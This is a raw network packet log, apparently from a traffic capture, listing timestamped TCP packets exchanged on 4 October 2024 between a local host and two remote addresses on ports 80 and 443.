                                                                                                                                            Oct 4, 2024 11:56:13.693531990 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.693547964 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.693588018 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.693644047 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.693660021 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.693672895 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.693713903 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.693722010 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.743613958 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.745074987 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:13.763521910 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763566971 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763580084 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763612986 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763628006 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763628006 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.763664961 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.763767004 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763782024 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763796091 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763809919 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763823986 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.763824940 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.763849020 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764014006 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764029026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764043093 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764058113 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764075041 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764096022 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764210939 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764225960 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764239073 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764252901 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764281034 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764395952 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764410973 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764434099 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764560938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764575005 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764588118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764600039 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764601946 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764616966 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764628887 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764631033 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764647961 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764651060 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764683962 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764847994 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764864922 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764878988 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764902115 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.764986038 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.764998913 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765037060 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765125036 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765140057 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765157938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765165091 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765181065 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765193939 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765209913 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765218019 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765223980 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765239954 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765245914 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765253067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765278101 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765758038 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765772104 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765785933 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765799999 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765809059 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765814066 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765827894 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765836954 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765842915 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765856981 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765862942 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765873909 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765887022 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765902042 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765912056 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.765916109 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765932083 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765947104 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.765954971 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.768423080 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768451929 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768476009 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.768521070 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768534899 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768589020 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768601894 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768616915 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768692017 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768707037 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.768707037 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.768712044 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.768740892 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.768825054 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.773588896 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773638964 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773653030 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773689032 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.773776054 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773791075 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773806095 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773813963 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.773822069 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.773844004 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774023056 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774039030 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774051905 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774072886 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774074078 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774087906 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774101973 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774113894 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774116993 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774132013 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774137974 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774147987 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774182081 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774436951 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774452925 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774569988 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774584055 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774596930 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774610996 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774619102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774627924 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774635077 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774647951 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774662018 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774667978 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774678946 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774693966 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774698973 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774708986 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774724960 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774732113 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.774740934 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.774761915 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.775254011 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775268078 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775280952 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775295019 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775306940 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.775311947 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775326967 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775332928 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.775341034 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775355101 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775368929 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775377035 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.775398970 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.775408983 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.776398897 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.797822952 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:13.797837019 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852777004 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852797985 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852813005 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852827072 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852838039 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.852840900 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852855921 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852866888 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.852891922 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.852895975 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852911949 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852927923 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.852948904 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853110075 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853122950 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853137970 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853142977 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853177071 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853245974 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853262901 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853276968 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853302956 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853390932 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853430986 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853461027 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853477001 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853573084 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853652000 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853666067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853679895 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853693962 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853708029 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853729010 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853807926 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853823900 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853837013 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853863955 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.853961945 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853979111 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.853991985 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854008913 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854151964 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854166985 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854180098 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854192019 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854195118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854218006 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854324102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854338884 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854362965 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854518890 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854532003 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854546070 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854557037 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854567051 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854579926 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854581118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854619980 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854655981 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854810953 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854825974 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854840040 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854851961 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854877949 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.854945898 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854963064 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854976892 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.854990005 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855000973 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855003119 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855019093 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855026960 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855038881 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855057001 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855578899 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855593920 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855607986 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855614901 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855623960 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855648041 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855752945 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855767965 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855782032 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855792046 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855797052 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855813026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855818987 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855829000 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855843067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.855853081 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.855880022 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856071949 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856086016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856118917 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856245041 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856261969 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856286049 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856298923 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856301069 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856337070 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856570959 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856584072 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856597900 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856611967 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856620073 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856627941 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856642008 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856648922 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856657028 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856669903 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856681108 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856684923 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856707096 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856713057 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856728077 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856748104 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856750011 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856762886 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856777906 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856789112 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856792927 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856812954 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.856869936 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856884003 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.856909990 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857551098 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857566118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857587099 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857593060 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857600927 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857615948 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857625008 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857630014 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857645035 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857656002 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857659101 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857682943 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857692003 CEST8049172192.3.220.20192.168.2.22
